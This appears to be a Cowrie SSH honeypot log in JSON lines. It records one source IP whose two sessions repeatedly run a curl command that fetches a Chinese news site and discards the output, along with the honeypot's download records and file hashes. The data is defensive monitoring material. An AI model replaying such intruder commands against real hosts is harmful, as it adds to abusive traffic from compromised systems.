{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.684345Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.685380Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.695619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.696565Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.701086Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.711116Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.727374Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.728141Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.733483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.734337Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.768897Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.769865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.774740Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.775674Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.805819Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.808613Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.809820Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.815552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.816377Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.820065Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.826641Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.828954Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.847432Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.849225Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.850250Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.852761Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.853724Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.888724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.889580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.892536Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.893320Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.900777Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.912985Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.915741Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.926848Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.927719Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.930096Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.930882Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.934978Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.956231Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.967549Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.968423Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.972708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.973883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.005513Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.006476Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.009399Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.010346Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.011214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.035087Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.039463Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.045223Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.047795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.048633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.050615Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.051504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.055253Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.057231Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.084904Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.085859Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.090036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.090819Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.093972Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.096162Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.098382Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.101898Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.104293Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.114705Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.125685Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.126483Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.129254Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.131181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.131966Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.167051Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.168010Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.170276Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.171244Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.204960Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.206431Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.207223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.210268Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.211028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.244415Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.245338Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.247100Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.247872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.282354Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
